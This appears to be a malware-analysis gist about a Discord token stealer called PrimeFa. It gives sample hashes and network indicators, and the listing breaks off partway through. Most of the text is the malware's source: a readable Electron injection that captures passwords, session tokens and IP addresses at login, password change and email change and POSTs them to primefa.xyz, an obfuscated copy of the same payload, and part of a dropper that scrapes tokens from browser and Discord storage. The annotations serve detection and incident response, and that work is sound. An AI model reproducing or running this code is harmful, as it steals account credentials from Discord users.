
@unex
Last active October 25, 2021 19:25
PrimeFa

PrimeFa

A Discord token stealer that I was sent.

The main file is Midlight_Cord.exe, but it has also been seen under other names.

VirusTotal: https://www.virustotal.com/gui/file/1b4e64fa51d6b755c7f0b0fcc54dc681b3438d4aa1c74027812138a70b722a04

Hybrid Analysis: https://www.hybrid-analysis.com/sample/1b4e64fa51d6b755c7f0b0fcc54dc681b3438d4aa1c74027812138a70b722a04/61747d2a58328966f5001fe6

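The sample contacts primefa.xyz -> ec2-3-132-67-147.us-east-2.compute.amazonaws.com -> 3.132.67.147. The address belongs to an AWS EC2 host, and such addresses can be reassigned to unrelated tenants, so treat the IP as an indicator tied to the time of this analysis; the file hash above does not have that limitation.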

https://www.hybrid-analysis.com/search?query=host%3A3.132.67.147

const fs = require('fs'),
path = require("path"),
{
BrowserWindow: BrowserWindow,
session: session
} = require("electron"),
https = require("https"),
querystring = require("querystring"),
electron = require("electron");
// Placeholder for the value sent as the `authorization` header on every POST to
// primefa.xyz in this script. The dropper listed later in this gist replaces the literal
// "[[[authorization]]]" with its own hard-coded `authorization` string before it writes
// this script to disk, so an infected index.js carries a real value here, not the placeholder.
var authcode = '[[[authorization]]]';
// One-shot marker check, called from the onBeforeRequest hook below.
//
// Returns true when the directory "PrimeFaOP" next to this file does not exist.
// When it does exist, the directory is removed, a script is executed in the first
// BrowserWindow that looks up a webpack module exposing `login` and calls its logout(),
// and the function returns false (last operand of the comma expression).
//
// Analyst note: the dropper in this gist creates "PrimeFaOP" when it overwrites index.js,
// so the logout runs once after infection -- presumably to make the user sign in again so
// that the auth/login request can be captured by the onCompleted hook. The directory name
// is a host-side indicator: its presence inside discord_desktop_core means the dropper ran
// and the client has not been started since.
function FirstTime() {
if (!fs['existsSync'](path["join"](__dirname, "PrimeFaOP"))) return !0;
return fs["rmdirSync"](path['join'](__dirname, "PrimeFaOP")), BrowserWindow["getAllWindows"]()[0]["webContents"]["executeJavaScript"]('function LogOut(){var t=webpackJsonp.push([[],{extra_id:(t,n,e)=>t.exports=e},[[\"extra_id\"]]]);(function(n){const e=\"string\"==typeof n?n:null;for(const o in t.c)if(t.c.hasOwnProperty(o)){const r=t.c[o].exports;if(r&&r.__esModule&&r.default&&(e?r.default[e]:n(r.default)))return r.default;if(r&&(e?r[e]:n(r)))return r}return null})(\"login\").logout()} LogOut()', !0)['then'](x => {}), !1;
}
const Filter = {
'urls': ["https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json", "https://*.discord.com/api/v*/applications/detectable", "https://discord.com/api/v*/applications/detectable", "https://*.discord.com/api/v*/users/@me/library", "https://discord.com/api/v*/users/@me/library", "https://*.discord.com/api/v*/users/@me/billing/subscriptions", 'https://discord.com/api/v*/users/@me/billing/subscriptions', "wss://remote-auth-gateway.discord.gg/*"]
};
// Exfiltration on sign-in: reports a captured password and session token to the
// collection server.
//
// Parameters:
//   login    - login field from the intercepted auth/login body (not used in this function)
//   password - password field from the intercepted auth/login body
//   token    - value returned by the getToken lookup run in the renderer
//
// Both steps run inside the renderer of the first BrowserWindow via executeJavaScript:
//   1. a synchronous XMLHttpRequest to https://www.myexternalip.com/raw to learn the public IP;
//   2. a POST to https://primefa.xyz/logged with JSON {token, ip, password} and the
//      `authorization` header set to authcode.
//
// Detection note: requests from the Discord client to www.myexternalip.com or primefa.xyz
// are not produced by this page's description of normal client traffic and are usable
// network indicators for this sample.
function Login(login, password, token) {
// `w` is assigned without a declaration here (ChangeEmail declares its own const).
w = BrowserWindow["getAllWindows"]()[0];
w["webContents"]["executeJavaScript"](' \
var xmlHttp = new XMLHttpRequest(); \
xmlHttp.open( "GET", "https://www.myexternalip.com/raw", false ); \
xmlHttp.send( null ); \
xmlHttp.responseText; \
', !0)["then"](ip => {
// The captured values are spliced into the script text by string concatenation.
w["webContents"]["executeJavaScript"](' \
fetch("https://primefa.xyz/logged", { \
method: "POST", \
headers: { \
"Content-Type": "application/json", \
authorization: "' + authcode + '" \
}, \
body: JSON.stringify({ \
token: "' + token + '", \
ip: "' + ip + '", \
password: "' + password + '" \
}), \
}) \
.then((x) => x.json()) \
.then((x) => { return console.log(x) }); \
', !0)["then"](x => {});
});
}
// Exfiltration on password change: reports the old and new password together with the
// session token.
//
// Parameters:
//   oldpasswd - `password` field of the intercepted PATCH users/@me body
//   passwd    - `new_password` field of the same body
//   token     - value returned by the getToken lookup run in the renderer
//
// Same two renderer-side steps as Login: a synchronous request to
// https://www.myexternalip.com/raw for the public IP, then a POST to
// https://primefa.xyz/passchanged with JSON {token, ip, oldpassword, password} and the
// `authorization` header set to authcode.
//
// Analyst note: because this hook reports password changes, changing the password from
// a client that still carries the modified index.js hands the new password to the same
// server; the client has to be cleaned or reinstalled first.
function ChangePassword(oldpasswd, passwd, token) {
// `w` is assigned without a declaration here as well.
w = BrowserWindow["getAllWindows"]()[0];
w["webContents"]["executeJavaScript"](' \
var xmlHttp = new XMLHttpRequest(); \
xmlHttp.open( "GET", "https://www.myexternalip.com/raw", false ); \
xmlHttp.send( null ); \
xmlHttp.responseText; \
', !0)['then'](ip => {
w["webContents"]["executeJavaScript"](' \
fetch("https://primefa.xyz/passchanged", { \
method: "POST", \
headers: { \
"Content-Type": "application/json", \
authorization: "' + authcode + '" \
} \
body: JSON.stringify({ \
token: "' + token + '", \
ip: "' + ip + '", \
oldpassword: "' + oldpasswd + '", \
password: "' + passwd + '" \
}), \
}) \
.then((x) => x.json()) \
.then((x) => { return console.log(x) }); \
');
});
}
// Exfiltration on e-mail change: reports the new e-mail address, the current password
// and the session token.
//
// Parameters:
//   email    - `email` field of the intercepted PATCH users/@me body
//   password - `password` field of the same body
//   token    - value returned by the getToken lookup run in the renderer
//
// Same two renderer-side steps as Login and ChangePassword: a synchronous request to
// https://www.myexternalip.com/raw for the public IP, then a POST to
// https://primefa.xyz/emailchanged with JSON {token, ip, email, password} and the
// `authorization` header set to authcode.
function ChangeEmail(email, password, token) {
const w = BrowserWindow["getAllWindows"]()[0];
w["webContents"]["executeJavaScript"](' \
var xmlHttp = new XMLHttpRequest(); \
xmlHttp.open("GET", "https://www.myexternalip.com/raw", false ); \
xmlHttp.send( null ); \
xmlHttp.responseText; \
', !0)["then"](ip => {
w["webContents"]["executeJavaScript"](' \
fetch("https://primefa.xyz/emailchanged", { \
method: "POST", \
headers: { \
"Content-Type": "application/json", \
authorization: "' + authcode + '" \
}, \
body: JSON.stringify({ \
token: "' + token + '", \
ip: "' + ip + '", \
email: "' + email + '", \
password: "' + password + '" \
}), \
}) \
.then((x) => x.json()) \
.then((x) => { return console.log(x) }); \
');
});
}
// Two session-level hooks installed on the default Electron session (one comma expression).
//
// Hook 1 - onBeforeRequest, limited to the URL patterns in Filter.
//   FirstTime() returns true  -> wss:// requests are cancelled, all others are allowed.
//   FirstTime() returns false -> the callback is not invoked for that request at all
//                                (this is also the call in which FirstTime() removes the
//                                marker directory and triggers the logout).
session["defaultSession"]["webRequest"]['onBeforeRequest'](Filter, (details, callback) => {
FirstTime() && (details["url"]["startsWith"]("wss://") ? callback({
'cancel': !0
}) : callback({
'cancel': !1
}));
}),
// Hook 2 - onHeadersReceived, registered without a filter, so it sees every response.
// It deletes the content-security-policy and content-security-policy-report-only response
// headers and adds Access-Control-Allow-Headers: *.
// Analyst note: removing the CSP is presumably what allows the scripts injected into the
// renderer to reach www.myexternalip.com and primefa.xyz. It also weakens the client for
// everything else it loads, so a host running this script has lost that protection
// regardless of whether any credentials were captured.
session['defaultSession']["webRequest"]["onHeadersReceived"]((details, callback) => {
delete details["responseHeaders"]["content-security-policy"],
delete details["responseHeaders"]['content-security-policy-report-only'],
callback({
'responseHeaders': {
...details["responseHeaders"],
'Access-Control-Allow-Headers': '*'
}
});
});
// URL patterns for the onCompleted hook below: the account endpoint (users/@me), the
// sign-in endpoint (auth/login) on discord.com / discordapp.com, and the Stripe token
// endpoint (https://api.stripe.com/v*/tokens). Despite the name, the filter covers
// sign-in and payment-token requests as well as password changes.
const ChangePasswordFilter = {
'urls': ["https://discord.com/api/v*/users/@me", "https://discordapp.com/api/v*/users/@me", 'https://*.discord.com/api/v*/users/@me', "https://discordapp.com/api/v*/auth/login", "https://discord.com/api/v*/auth/login", 'https://*.discord.com/api/v*/auth/login', "https://api.stripe.com/v*/tokens"]
};
// onCompleted hook for the URLs in ChangePasswordFilter. It reads the request body the
// client itself sent (details.uploadData[0].bytes), so the credentials are captured in
// clear text after TLS has already been handled by the client. Three branches follow.
session["defaultSession"]['webRequest']["onCompleted"](ChangePasswordFilter, (details, callback) => {
// Branch 1: successful sign-in (URL ends with "login", status 200). The login and
// password fields are taken from the JSON body, the session token is read in the
// renderer through a webpack module lookup for getToken, and Login() sends them out.
if (details['url']["endsWith"]('login') && 200 == details["statusCode"]) {
const data = JSON["parse"](Buffer["from"](details["uploadData"][0]['bytes'])["toString"]()),
login = data["login"],
password = data["password"];
BrowserWindow["getAllWindows"]()[0]["webContents"]["executeJavaScript"]("var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token", !0)["then"](r => {
Login(login, password, r);
});
}
// Branch 2: successful account update (URL ends with "users/@me", status 200, PATCH).
// Only acts when the body has a non-empty `password`; then a non-empty `new_password`
// leads to ChangePassword() and a non-empty `email` leads to ChangeEmail(), each after
// the same getToken lookup.
if (details['url']["endsWith"]("users/@me") && 200 == details["statusCode"] && 'PATCH' == details["method"]) {
const data = JSON["parse"](Buffer["from"](details['uploadData'][0]["bytes"])['toString']());
null != data["password"] && null != data["password"] && '' != data["password"] && (null != data['new_password'] && null != data["new_password"] && '' != data["new_password"] && BrowserWindow["getAllWindows"]()[0]['webContents']["executeJavaScript"]('var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\"extra_id\"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)\"getToken\"===e&&(token=t.default.getToken())} token', !0)["then"](r => {
ChangePassword(data["password"], data["new_password"], r);
}), null != data["email"] && null != data['email'] && '' != data["email"] && BrowserWindow["getAllWindows"]()[0]['webContents']["executeJavaScript"]("var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token", !0)['then'](r => {
ChangeEmail(data["email"], data["password"], r);
}));
}
// Branch 3: Stripe token request (URL ends with "tokens"). The form body is parsed and
// the token lookup is run, but in this listing both results are discarded and nothing
// is sent anywhere. The filter entry still shows that payment requests were in scope.
if (details["url"]['endsWith']('tokens')) {
const w = BrowserWindow["getAllWindows"]()[0];
querystring["parse"](decodeURIComponent(Buffer["from"](details["uploadData"][0]['bytes'])['toString']())), w["webContents"]["executeJavaScript"]("var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token", !0)["then"](r => {});
}
}),
// Re-exports the client's own core.asar so the application keeps working after the
// file has been replaced. Triage note: a clean discord_desktop_core index.js is normally
// just this one line, so any additional code in that file is a sign of tampering.
module["exports"] = require('./core.asar');
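// Obfuscated form of the injected script, as served from http://primefa.xyz/init/delta/obfus/inject/raw
// (the dropper listed after it downloads the payload from this URL). It uses a rotated string-array
// lookup (_0x3b49 / _0x1f69) and appears to carry the same hooks and primefa.xyz endpoints as the
// readable listing above.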
const _0x567b59=_0x1f69;(function(_0x4f91cd,_0x17c370){const _0x4259b2=_0x1f69,_0x1b9aad=_0x4f91cd();while(!![]){try{const _0x2ab58e=-parseInt(_0x4259b2(0x1c1))/0x1*(-parseInt(_0x4259b2(0x1bd))/0x2)+parseInt(_0x4259b2(0x1f6))/0x3*(-parseInt(_0x4259b2(0x1b8))/0x4)+-parseInt(_0x4259b2(0x1f9))/0x5+parseInt(_0x4259b2(0x1ec))/0x6+-parseInt(_0x4259b2(0x1d1))/0x7+parseInt(_0x4259b2(0x1e5))/0x8*(parseInt(_0x4259b2(0x1c2))/0x9)+parseInt(_0x4259b2(0x1da))/0xa;if(_0x2ab58e===_0x17c370)break;else _0x1b9aad['push'](_0x1b9aad['shift']());}catch(_0x5873be){_0x1b9aad['push'](_0x1b9aad['shift']());}}}(_0x3b49,0x19ea1));const fs=require('fs'),path=require(_0x567b59(0x1e9)),{BrowserWindow:BrowserWindow,session:session}=require(_0x567b59(0x1de)),https=require(_0x567b59(0x1f4)),querystring=require(_0x567b59(0x1d6)),electron=require(_0x567b59(0x1de));var authcode='[[[authorization]]]';function FirstTime(){const _0x476429=_0x567b59;if(!fs['existsSync'](path[_0x476429(0x1ea)](__dirname,_0x476429(0x1cf))))return!0x0;return fs[_0x476429(0x1cc)](path['join'](__dirname,_0x476429(0x1cf))),BrowserWindow[_0x476429(0x1d5)]()[0x0][_0x476429(0x1e8)][_0x476429(0x1d8)]('function\x20LogOut(){var\x20t=webpackJsonp.push([[],{extra_id:(t,n,e)=>t.exports=e},[[\x22extra_id\x22]]]);(function(n){const\x20e=\x22string\x22==typeof\x20n?n:null;for(const\x20o\x20in\x20t.c)if(t.c.hasOwnProperty(o)){const\x20r=t.c[o].exports;if(r&&r.__esModule&&r.default&&(e?r.default[e]:n(r.default)))return\x20r.default;if(r&&(e?r[e]:n(r)))return\x20r}return\x20null})(\x22login\x22).logout()}\x20LogOut()',!0x0)['then'](_0x4def16=>{}),!0x1;}const Filter={'urls':[_0x567b59(0x1e3),_0x567b59(0x1be),_0x567b59(0x1e2),_0x567b59(0x1dd),_0x567b59(0x1eb),_0x567b59(0x1c6),'https://discord.com/api/v*/users/@me/billing/subscriptions',_0x567b59(0x1d2)]};function _0x3b49(){const 
_0x3f5a25=['webContents','path','join','https://discord.com/api/v*/users/@me/library','215958nWbBCi','\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ip:\x20\x22','url','https://api.stripe.com/v*/tokens','https://discord.com/api/v*/auth/login','statusCode','\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20},\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20body:\x20JSON.stringify({\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20token:\x20\x22','toString','https','parse','2166PDuNed','new_password','password','630390yiZEvQ','\x0a\x20\x20\x20\x20\x20\x20\x20\x20fetch(\x22https://primefa.xyz/passchanged\x22,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method:\x20\x22POST\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20headers:\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22Content-Type\x22:\x20\x22application/json\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20authorization:\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22','512THQYLY','bytes','startsWith','\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20password:\x20\x22','responseHeaders','62JScLEW','https://*.discord.com/api/v*/applications/detectable','login','\x0a\x20\x20\x20\x20\x20\x20\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22https://www.myexternalip.com/raw\x22,\x20false\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.responseText;\x0a\x20\x20\x20\x20','1246pKXOnP','244116TuXJjP','wss://','\x0a\x20\x20\x20\x20\x20\x20\x20\x20fetch(\x22https://primefa.xyz/logged\x22,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method:\x20\x22POST\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20headers:\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22Content-Type\x22:\x20\x22application/json\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20authorization:\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x22','users/@me','https://*.discord.com/api/v*/users/@me/billing/subscriptions','uploadData','var\x20req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\x22extra_id\x22]]]);for(let\x20e\x20in\x20req.c)if(req.c.hasOwnProperty(e)){let\x20t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let\x20e\x20in\x20t.default)\x22getToken\x22===e&&(token=t.default.getToken())}\x20token','https://discordapp.com/api/v*/users/@me','email','webRequest','rmdirSync','then','defaultSession','PrimeFaOP','method','733593skakNE','wss://remote-auth-gateway.discord.gg/*','content-security-policy','\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}),\x0a\x20\x20\x20\x20\x20\x20\x20\x20})\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20x.json())\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20{\x20return\x20console.log(x)\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20','getAllWindows','querystring','from','executeJavaScript','endsWith','3005710xDRsVZ','https://discord.com/api/v*/users/@me','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22https://www.myexternalip.com/raw\x22,\x20false\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.responseText;\x0a\x20\x20\x20\x20\x20\x20\x20\x20','https://*.discord.com/api/v*/users/@me/library','electron','\x0a\x20\x20\x20\x20\x20\x20\x20\x20fetch(\x22https://primefa.xyz/emailchanged\x22,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20method:\x20\x22POST\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20headers:\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22Content-Type\x22:\x20\x22application/json\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20authorization:\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22','\x22\x0a\x20\x20\x20\x20\x20\x2
0\x20\x20\x20\x20}),\x0a\x20\x20\x20\x20\x20\x20\x20\x20})\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20x.json())\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.then((x)\x20=>\x20{\x20return\x20console.log(x)\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20','exports','https://discord.com/api/v*/applications/detectable','https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json','onHeadersReceived','16jqYKjW','https://discordapp.com/api/v*/auth/login','onCompleted'];_0x3b49=function(){return _0x3f5a25;};return _0x3b49();}function Login(_0x1992a6,_0x496a17,_0xe44c90){const _0x38ce10=_0x567b59,_0x1cace1=BrowserWindow[_0x38ce10(0x1d5)]()[0x0];_0x1cace1[_0x38ce10(0x1e8)][_0x38ce10(0x1d8)](_0x38ce10(0x1c0),!0x0)[_0x38ce10(0x1cd)](_0x2bbb9f=>{const _0x37c562=_0x38ce10;_0x1cace1[_0x37c562(0x1e8)][_0x37c562(0x1d8)](_0x37c562(0x1c4)+authcode+'\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20},\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20body:\x20JSON.stringify({\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20token:\x20\x22'+_0xe44c90+_0x37c562(0x1ed)+_0x2bbb9f+_0x37c562(0x1bb)+_0x496a17+_0x37c562(0x1d4),!0x0)[_0x37c562(0x1cd)](_0x5c208b=>{});});}function ChangePassword(_0x2a7a72,_0x49b16f,_0x222172){const _0x779339=_0x567b59,_0x5d8a93=BrowserWindow[_0x779339(0x1d5)]()[0x0];_0x5d8a93[_0x779339(0x1e8)][_0x779339(0x1d8)](_0x779339(0x1dc),!0x0)['then'](_0x5da35b=>{const _0x2fb6df=_0x779339;_0x5d8a93[_0x2fb6df(0x1e8)][_0x2fb6df(0x1d8)](_0x2fb6df(0x1fa)+authcode+_0x2fb6df(0x1f2)+_0x222172+_0x2fb6df(0x1ed)+_0x5da35b+'\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20oldpassword:\x20\x22'+_0x2a7a72+_0x2fb6df(0x1bb)+_0x49b16f+_0x2fb6df(0x1e0));});}function ChangeEmail(_0x2313aa,_0x381998,_0x4f3fa7){const 
_0x2748f9=_0x567b59,_0x64e320=BrowserWindow[_0x2748f9(0x1d5)]()[0x0];_0x64e320[_0x2748f9(0x1e8)][_0x2748f9(0x1d8)]('\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20var\x20xmlHttp\x20=\x20new\x20XMLHttpRequest();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.open(\x20\x22GET\x22,\x20\x22https://www.myexternalip.com/raw\x22,\x20false\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.send(\x20null\x20);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20xmlHttp.responseText;\x0a\x20\x20\x20\x20\x20\x20\x20\x20',!0x0)[_0x2748f9(0x1cd)](_0x176e21=>{const _0x5c6be8=_0x2748f9;_0x64e320[_0x5c6be8(0x1e8)][_0x5c6be8(0x1d8)](_0x5c6be8(0x1df)+authcode+_0x5c6be8(0x1f2)+_0x4f3fa7+_0x5c6be8(0x1ed)+_0x176e21+'\x22,\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20email:\x20\x22'+_0x2313aa+_0x5c6be8(0x1bb)+_0x381998+_0x5c6be8(0x1e0));});}session[_0x567b59(0x1ce)][_0x567b59(0x1cb)]['onBeforeRequest'](Filter,(_0x119ddd,_0x29a67f)=>{const _0x9af903=_0x567b59;FirstTime()&&(_0x119ddd[_0x9af903(0x1ee)][_0x9af903(0x1ba)](_0x9af903(0x1c3))?_0x29a67f({'cancel':!0x0}):_0x29a67f({'cancel':!0x1}));}),session['defaultSession'][_0x567b59(0x1cb)][_0x567b59(0x1e4)]((_0x1d8581,_0x88bf91)=>{const _0x5e2941=_0x567b59;delete _0x1d8581[_0x5e2941(0x1bc)][_0x5e2941(0x1d3)],delete _0x1d8581[_0x5e2941(0x1bc)]['content-security-policy-report-only'],_0x88bf91({'responseHeaders':{..._0x1d8581[_0x5e2941(0x1bc)],'Access-Control-Allow-Headers':'*'}});});function _0x1f69(_0x5bfbd0,_0x568a9b){const _0x3b49dc=_0x3b49();return _0x1f69=function(_0x1f699a,_0x27a00b){_0x1f699a=_0x1f699a-0x1b8;let _0x323d61=_0x3b49dc[_0x1f699a];return _0x323d61;},_0x1f69(_0x5bfbd0,_0x568a9b);}const ChangePasswordFilter={'urls':[_0x567b59(0x1db),_0x567b59(0x1c9),'https://*.discord.com/api/v*/users/@me',_0x567b59(0x1e6),_0x567b59(0x1f0),'https://*.discord.com/api/v*/auth/login',_0x567b59(0x1ef)]};session[_0x567b59(0x1ce)]['webRequest'][_0x567b59(0x1e7)](ChangePasswordFilter,(_0x4a337c,_0x338c7c)=>{const 
_0x59d4a1=_0x567b59;if(_0x4a337c['url'][_0x59d4a1(0x1d9)]('login')&&0xc8==_0x4a337c[_0x59d4a1(0x1f1)]){const _0x1c73f7=JSON[_0x59d4a1(0x1f5)](Buffer[_0x59d4a1(0x1d7)](_0x4a337c[_0x59d4a1(0x1c7)][0x0]['bytes'])[_0x59d4a1(0x1f3)]()),_0x50f104=_0x1c73f7[_0x59d4a1(0x1bf)],_0x9db1fd=_0x1c73f7[_0x59d4a1(0x1f8)];BrowserWindow[_0x59d4a1(0x1d5)]()[0x0][_0x59d4a1(0x1e8)][_0x59d4a1(0x1d8)](_0x59d4a1(0x1c8),!0x0)[_0x59d4a1(0x1cd)](_0x16a388=>{Login(_0x50f104,_0x9db1fd,_0x16a388);});}if(_0x4a337c['url'][_0x59d4a1(0x1d9)](_0x59d4a1(0x1c5))&&0xc8==_0x4a337c[_0x59d4a1(0x1f1)]&&'PATCH'==_0x4a337c[_0x59d4a1(0x1d0)]){const _0xa11694=JSON[_0x59d4a1(0x1f5)](Buffer[_0x59d4a1(0x1d7)](_0x4a337c['uploadData'][0x0][_0x59d4a1(0x1b9)])['toString']());null!=_0xa11694[_0x59d4a1(0x1f8)]&&null!=_0xa11694[_0x59d4a1(0x1f8)]&&''!=_0xa11694[_0x59d4a1(0x1f8)]&&(null!=_0xa11694['new_password']&&null!=_0xa11694[_0x59d4a1(0x1f7)]&&''!=_0xa11694[_0x59d4a1(0x1f7)]&&BrowserWindow[_0x59d4a1(0x1d5)]()[0x0]['webContents'][_0x59d4a1(0x1d8)]('var\x20req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\x22extra_id\x22]]]);for(let\x20e\x20in\x20req.c)if(req.c.hasOwnProperty(e)){let\x20t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let\x20e\x20in\x20t.default)\x22getToken\x22===e&&(token=t.default.getToken())}\x20token',!0x0)[_0x59d4a1(0x1cd)](_0x1c9de1=>{const _0xb88817=_0x59d4a1;ChangePassword(_0xa11694[_0xb88817(0x1f8)],_0xa11694[_0xb88817(0x1f7)],_0x1c9de1);}),null!=_0xa11694[_0x59d4a1(0x1ca)]&&null!=_0xa11694['email']&&''!=_0xa11694[_0x59d4a1(0x1ca)]&&BrowserWindow[_0x59d4a1(0x1d5)]()[0x0]['webContents'][_0x59d4a1(0x1d8)](_0x59d4a1(0x1c8),!0x0)['then'](_0x2116e1=>{const _0x473f53=_0x59d4a1;ChangeEmail(_0xa11694[_0x473f53(0x1ca)],_0xa11694[_0x473f53(0x1f8)],_0x2116e1);}));}if(_0x4a337c[_0x59d4a1(0x1ee)]['endsWith']('tokens')){const 
_0x12917f=BrowserWindow[_0x59d4a1(0x1d5)]()[0x0];querystring[_0x59d4a1(0x1f5)](decodeURIComponent(Buffer[_0x59d4a1(0x1d7)](_0x4a337c[_0x59d4a1(0x1c7)][0x0]['bytes'])['toString']())),_0x12917f[_0x59d4a1(0x1e8)][_0x59d4a1(0x1d8)](_0x59d4a1(0x1c8),!0x0)[_0x59d4a1(0x1cd)](_0x43e6cd=>{});}}),module[_0x567b59(0x1e1)]=require('./core.asar');
const fs = require("fs"),
path = require("path"),
fetch = require("node-fetch"),
publicIp = require("public-ip"),
fkill = require("kill-process-by-name");
// First stage (Node.js): harvests tokens from local storage and replaces the Discord
// client's index.js with the payload shown earlier in this gist.
//
// Host indicators visible in this listing:
//   - reads *.log / *.ldb under "<profile>\Local Storage\leveldb" for Discord, Discord
//     Canary, Discord PTB, Chrome, Opera, Brave and Yandex;
//   - creates a "PrimeFaOP" directory and overwrites index.js inside a
//     discord_desktop_core folder under %LOCALAPPDATA%;
//   - kills processes named "discord" and "discordPtb";
//   - prints the decoy line "Runtime Daemon Un-Responsive, Please Retry Later".
// Network indicators: plain-HTTP requests to primefa.xyz (/init/status, /opened,
// /init/delta/obfus/inject/raw) and a public-IP lookup through the public-ip package.
//
// Hard-coded value sent as the `authorization` header and substituted for the
// "[[[authorization]]]" placeholder in the downloaded payload; presumably identifies the
// build or operator to the server.
var authorization = "e190297d642abb4a7aee79bd76806797baa4dd2485935cb39977780915aa6343";
// Gate: nothing below runs unless the server answers exactly "ACTIVE".
fetch("http://primefa.xyz/init/status").then(e => e.text()).then(async e => {
if ("ACTIVE" === e) {
// a(profileDir): returns every string in the profile's leveldb .log/.ldb files that
// matches one of two token-shaped patterns ("mfa." + 84 chars, or 24.6.27 chars).
// Any error (missing directory, unreadable file) is swallowed and yields what was
// collected so far.
function a(e) {
e += "\\Local Storage\\leveldb";
let a = [];
try {
fs.readdirSync(path.normalize(e)).map(t => {
(t.endsWith(".log") || t.endsWith(".ldb")) && fs.readFileSync(`${e}\\${t}`, "utf8").split(/\r?\n/).forEach(async e => {
const t = [new RegExp(/mfa\.[\w-]{84}/g), new RegExp(/[\w-]{24}\.[\w-]{6}\.[\w-]{27}/g)];
for (const r of t) {
const t = e.match(r);
t && t.forEach(e => {
a.push(e)
})
}
})
})
} catch {}
return a
}! function () {
// Profile locations to scan; only populated when running on Windows.
let e;
if ("win32" == process.platform) {
const a = process.env.LOCALAPPDATA,
t = process.env.APPDATA;
e = {
Discord: path.join(t, "Discord"),
"Discord Canary": path.join(t, "discordcanary"),
"Discord PTB": path.join(t, "discordptb"),
"Google Chrome": path.join(a, "Google", "Chrome", "User Data", "Default"),
Opera: path.join(t, "Opera Software", "Opera Stable"),
Brave: path.join(a, "BraveSoftware", "Brave-Browser", "User Data", "Default"),
